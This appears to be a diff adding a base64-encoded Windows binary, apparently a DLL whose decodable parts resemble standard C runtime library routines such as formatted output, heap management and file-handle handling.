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
